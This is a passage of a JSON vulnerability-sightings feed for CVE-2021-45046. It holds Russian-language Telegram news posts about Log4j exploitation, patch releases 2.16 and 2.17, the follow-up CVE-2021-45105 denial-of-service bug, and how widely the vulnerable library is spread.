\u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0435\u0439 \u0432\u0441\u0435\u043e\u0431\u0449\u0435\u0433\u043e \u0445\u0430\u043e\u0441\u0430, \u0410\u0420\u0422 \u0437\u0430\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u0442\u0440\u0430\u0434\u0438\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u043d\u0438\u0445 \u0437\u0430\u0434\u0430\u0447 \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0443, \u043d\u043e \u043f\u043e\u043c\u0438\u043c\u043e \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0438\u0440\u0430\u043d\u0441\u043a\u0438\u0435 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u044b \u0432\u044b\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0438 \u043f\u043e\u0434 \u0431\u043e\u043b\u0435\u0435 \u0430\u0433\u0440\u0435\u0441\u0441\u0438\u0432\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, 
\u043f\u0440\u0435\u0441\u043b\u0435\u0434\u0443\u044f \u043f\u043e\u0434\u0440\u044b\u0432\u043d\u044b\u0435 \u0446\u0435\u043b\u0438. \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Mandiant \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0441\u043e\u043e\u0431\u0449\u0430\u0442\u044c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0442\u043e\u043c, \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0410\u0420\u0422 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u043b\u0438 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\n \n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 Check Point \u0441 44% \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0439 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0431\u043e\u043b\u0435\u0435 1,3 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b\u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u044b \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0430\u043c\u0438. 
\u0412\u0441\u0435\u043e\u0431\u0449\u0438\u0439 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0439 \u0430\u0436\u0438\u043e\u0442\u0430\u0436 \u0438 \u0445\u0430\u043e\u0441 \u0432\u043e \u0432\u0441\u0435\u043c \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043c\u0438\u0440\u0435 \u043d\u0435 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0442 \u0443\u0434\u0438\u0432\u043b\u0435\u043d\u0438\u044f, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Wiz \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 89% \u0432\u0441\u0435\u0445 \u0441\u0440\u0435\u0434 \u0438\u043c\u0435\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Log4j, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0434\u0430\u0436\u0435 \u043d\u0435 \u0434\u043e\u0433\u0430\u0434\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043e\u0431 \u044d\u0442\u043e\u043c. 
\u041d\u0430\u0441\u0442\u043e\u044f\u0449\u0430\u044f \u0447\u0435\u0440\u043d\u0430\u044f \u043f\u044f\u0442\u043d\u0438\u0446\u0430 \u0434\u043b\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0432\u0441\u0435\u0445 \u043c\u0430\u0441\u0442\u0435\u0439.\n \n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e Microsoft \u0443\u0436\u0435 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u044b Cobalt Strike, \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u043f\u0435\u0440\u0432\u044b\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 Log4j, \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0449\u0435\u0433\u043e ransomware, \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0431\u043e\u043b\u0435\u0435 \u0443\u0432\u0435\u0441\u0438\u0441\u0442\u044b\u0435 \u0430\u043a\u0442\u043e\u0440\u044b \u0443\u0436\u0435 \u0432\u043e\u0432\u0441\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Log4 Jam, \u043d\u043e \u043f\u043e\u043a\u0430 \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0435\u043d\u044b \u0431\u043e\u043b\u0435\u0435 \u043d\u0430 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u0448\u0438\u0440\u043e\u043a\u043e\u043c \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433\u0435. 
\u0410 \u043f\u043e \u0438\u0441\u0442\u0435\u0447\u0435\u043d\u0438\u0438 \u043f\u0430\u0440\u044b \u0442\u0440\u043e\u0439\u043a\u0438 \u043d\u0435\u0434\u0435\u043b\u044c \u043c\u0435\u0441\u0442 \u043d\u0430 DLS, \u0441\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0445\u0432\u0430\u0442\u0430\u0442\u044c, \u0447\u0442\u043e\u0431 \u0443\u043f\u043e\u0440\u044f\u0434\u043e\u0447\u0438\u0442\u044c \u0432\u0441\u0435\u0445 \u043d\u043e\u0432\u044b\u0445 \u0436\u0435\u0440\u0442\u0432 ransomware.\n \n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u043a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u043c\u043e\u043c\u0435\u043d\u0442\u0443 \u043f\u043e\u043c\u0438\u043c\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u0435\u0440\u0435\u0434 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438 \u043f\u043e \u0418\u0411 \u0441\u0442\u043e\u0438\u0442 \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u0441\u043b\u043e\u0436\u043d\u0430\u044f \u0437\u0430\u0434\u0430\u0447\u0430: \u0432\u044b\u044f\u0432\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0432 \u0441\u0435\u0442\u0438.", "creation_timestamp": "2021-12-15T15:20:00.000000Z"}, {"uuid": "98a8192c-7823-4a6c-bef3-71fb2866f834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/true_secator/2459", "content": "\u200b\u200b\u0415\u0449\u0435 \u0440\u0430\u0437 Merry Christmas!\n \nLog4shell \u0432\u0441\u0435 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043e\u0442\u0441\u0442\u0443\u043f\u0438\u0442. 
\u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b \u0441 \u0442\u0435\u0445 \u043f\u043e\u0440, \u043a\u0430\u043a \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u043d\u0430\u0447\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u0438\u043d\u043d\u0430\u044f \u044d\u043f\u043e\u043f\u0435\u044f \u0441 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 0-day \u0432 log4j, \u0434\u043b\u044f \u043c\u043d\u043e\u0433\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f 2.16 \u043d\u0430 \u043a\u0430\u043a\u043e\u0435-\u0442\u043e \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0438\u0437 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438. \u041d\u043e, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u043e\u043d\u0430 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0430 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0431\u0430\u0433\u0438 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u0432\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0441 \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0432\u0435\u0440\u0441\u0438\u0438 2.17.0.\n \n\u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0432\u0435\u0440\u0441\u0438\u044f \u041f\u041e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 
\u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 (DoS), \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d CVE-2021-45105. \u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a 2.15.0 \u0431\u044b\u043b \u043f\u0440\u0438\u0437\u043d\u0430\u043d \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u043a \u043d\u0435\u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 DoS (CVE-2021-45046). \u041f\u043e\u0437\u0436\u0435 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u0431\u044b\u043b \u043f\u043e\u0432\u044b\u0448\u0435\u043d Apache \u0441 \u043d\u0438\u0437\u043a\u043e\u0433\u043e (3,7) \u0434\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e (9,0) \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043d\u043e\u0432\u044b\u0435 \u043e\u0431\u0445\u043e\u0434\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u043a\u0440\u0430\u0441\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n \n\u041f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0442\u0440\u0435\u0445 \u0434\u043d\u0435\u0439 Apache \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b \u043d\u043e\u0432\u0443\u044e CVE \u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u043f\u0435\u0447\u0435\u043d\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e log4j 2.17.0.\n 
\nCVE-2021-45105 \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0439 \u00ab\u0432\u044b\u0441\u043e\u043a\u0438\u0439\u00bb (7,5) \u0431\u0430\u043b\u043b \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 log4j 2.16 \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 \u043d\u0435\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u043e\u0439 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0438 \u043f\u0440\u0438 \u0441\u0430\u043c\u043e\u0440\u0435\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u043f\u043e\u0438\u0441\u043a\u0435 JNDI, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b, \u0431\u044b\u043b \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 2.16, \u043d\u043e \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\u0445 \u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a \u043e\u0448\u0438\u0431\u043a\u0435 StackOverflowError. \u0412\u0435\u0440\u0441\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430 \u043d\u0430  \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u043c Java-\u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 - Maven Central. 
\u0412\u044b\u043f\u0443\u0441\u043a 2.12.3 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u043f\u043e\u0434\u0445\u043e\u0434\u0435 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0435\u0442\u043a\u0438 2.12.x.\n \n\u0410\u0431\u0441\u0442\u0440\u0430\u0433\u0438\u0440\u0443\u044f\u0441\u044c \u043e\u0442 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Google, \u0431\u043e\u043b\u0435\u0435 35 000 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 Java \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 log4j, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0445 \u0431\u043e\u043b\u0435\u0435 8% \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f Maven Central. \u0411\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u0443\u044e\u0442 \u0431\u0430\u0433\u0438 log4j \u00ab\u043a\u043e\u0441\u0432\u0435\u043d\u043d\u043e\u00bb \u043f\u043e \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0443 \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u0438\u0432\u043d\u043e\u0439 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0438\u0437 35 863 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 Google \u043f\u0430\u043a\u0435\u0442\u043e\u0432, \u043e\u043a\u043e\u043b\u043e 7000 \u0437\u0430\u0438\u043c\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 log4j \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e. 
\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Google \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u0432 log4j \u0437\u0430\u0442\u044f\u043d\u0435\u0442\u0441\u044f \u043d\u0430 \u0433\u043e\u0434\u044b.\n \n\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043d\u044b\u043d\u0435\u0448\u043d\u0438\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 log4j \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u0442\u044c Apache \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439.", "creation_timestamp": "2021-12-20T13:48:25.000000Z"}, {"uuid": "a9368966-9ab0-4825-a609-f28bed32f357", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "Telegram/QbzltGTL5MLooH2kEl1qS06h23oJX4UpKYkbnKcssYleTA", "content": "", "creation_timestamp": "2022-01-03T05:49:38.000000Z"}, {"uuid": "0a9c21ca-4cae-4b8a-beeb-ffe941c944ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/NeKaspersky/1587", "content": 
"\u041a\u0442\u043e \u0442\u0443\u0442 \u0441\u0430\u043c\u044b\u0439 \u0441\u0438\u043b\u044c\u043d\u044b\u0439 \u0438 \u043a\u0440\u0443\u0442\u043e\u0439? \u0421\u0430\u043c\u0430\u044f \u0441\u0438\u043b\u044c\u043d\u0430\u044f \u0438 \u043a\u0440\u0443\u0442\u0430\u044f \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c log4j. \n\n\u0412 \u043f\u0440\u043e\u0448\u043b\u044b\u0439 \u0440\u0430\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Log4Shell, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 \u0432 10/10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043d\u0430\u0432\u0435\u043b\u0430 \u043c\u043d\u043e\u0433\u043e \u0448\u0443\u043c\u0430. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 2.15 \u0440\u0435\u0448\u0438\u043b\u043e \u0432\u0441\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u043d\u043e \u0442\u0443\u0442 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u043e\u043d\u0430 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (CVE-2021-45046), \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u044e\u0449\u0430\u044f\u0441\u044f \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0432\u0441\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u0435\u0440\u0441\u0438\u0438 2.15 \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0442\u043e\u0433\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u043b\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u00ablog4j2.noFormatMsgLookup\u00bb \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b. 
\n\n\u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (Log4Shell, CVE-2021-44228) \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u0441\u043f\u043e\u043a\u043e\u0439\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0441\u0432\u043e\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435, \u0430 \u0442\u0435\u043f\u0435\u0440\u044c \u0432\u0441\u0435 \u0435\u0433\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435\u043c \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0434\u043b\u044f \u0430\u0432\u0430\u0440\u0438\u0439\u043d\u043e\u0433\u043e \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0438\u0437-\u0437\u0430 \u0438\u0441\u0447\u0435\u0440\u043f\u0430\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432. \n\nCVE-2021-45046  \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u043e\u0431\u0445\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b \u0437\u0430 \u0441\u0447\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0434\u043b\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u0432 \u043b\u043e\u0433 \u0434\u0430\u043d\u043d\u044b\u0445. 
\u0422\u0435, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u043b\u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u044c \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 JNDI, \u043f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0438 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0438\u043b\u0438 MDC-\u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u044e\u0449\u0438\u0445 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u044b\u0432\u043e\u0434\u0430 \u0432 \u043b\u043e\u0433.\n\n\u0418 \u0432\u0441\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0432\u0440\u043e\u0434\u0435 \u043a\u0430\u043a \u0440\u0435\u0448\u0438\u043b\u0438\u0441\u044c \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u0445\u043e\u0434\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f 2.16 \u0438 2.12.2, \u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u00ab\u043d\u043e\u0432\u0435\u043d\u044c\u043a\u0438\u0439\u00bb. \u0418\u043c\u044f \u0435\u043c\u0443 CVE-2021-45105, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0434\u0432\u0443\u0445 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c, \u043e\u0442\u043d\u0435\u0441\u043b\u0438 \u043a \u0442\u0430\u043a\u0438\u043c \u0436\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u043c, \u043d\u043e \u043d\u0435 \u0442\u0430\u043a\u0438\u043c \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c 